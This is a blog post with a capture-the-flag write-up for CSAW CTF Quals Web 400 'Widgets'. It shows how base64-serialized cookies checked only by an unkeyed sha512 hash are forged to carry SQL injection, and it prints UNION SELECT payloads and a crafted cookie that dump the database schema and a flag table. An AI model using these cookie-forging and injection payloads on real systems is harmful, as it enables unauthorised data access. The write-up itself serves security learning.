Thursday, September 26, 2013

CSAW CTF Quals: Web 400 - Widgets

Once an account was registered on the site, the account should have been logged into. This account can have any username and password.

If you explore the page you will find that there is a background image of a dog. The CSS also had an ASCII image of a dog and contained text that said “Doge flage is the key,” which was later changed to “doge flage is not the key.” These were all red-herrings and did not play a part in finding the key at all.

You could also make widgets on this site and after some observation, you could see the cookies on the page change when a new widget was created.

The widget_tracker cookie was found to be base64 encoded and could be converted to an ASCII string along the lines of:
a:“number of widgets”:{i:“widget one”;id:“widget one id”;i:“widget two”;id:“widget one id”;}
The widget_validate cookie was found to be just a sha512 encryption of this string.

After a lot of testing, we found that cookies could be modified an passed containing SQL injections. The format for them was similar to the following:
a:“number of widgets”:{i:“widget one”;s: “length of injection”:”injection”;}
A useful tool for editing cookies is the “edit this cookie” extension for chrome. Remember to find the length of the injection and input the value after “s:”

By experimenting with SQL injections we were able to determine there was an information schema with four columns using the following ASCII value of the cookies.
a:1:{i:0;s:109:"7933 or 1-1) UNION SELECT TABLE_NAME, TABLE_NAME, TABLE_NAME, TABLE_NAME  FROM information_schema.tables; -- ";}

Within this information schema there was a table named flag. So a new cookie was made to view this table using the following ASCII string:
a:1:{i:0;s:44:"7933) UNION SELECT *, 1, 2, 3 FROM flag; -- ";}

This created the widget_tracker base64 cookie: YToxOntpOjA7czo0NDoiNzkzMykgVU5JT04gU0VMRUNUICosIDEsIDIsIDMgRlJPTSBmbGFnOyAtLSAiO30%3D

This also create the widget_validate cookie: 17cd76a036f7541bac1e669ffada8a9389848e9bd19606689860a294f37800216bd6cfa37c2ff2a402c7809b94fb28185958ddfeb14373f0d4694c48a9704682

These were submitted and the page was refreshed (shown below).

If you inspect an element on the page and shift through the code you will find the key! “key{needs_moar_hmac}”


No comments:

Post a Comment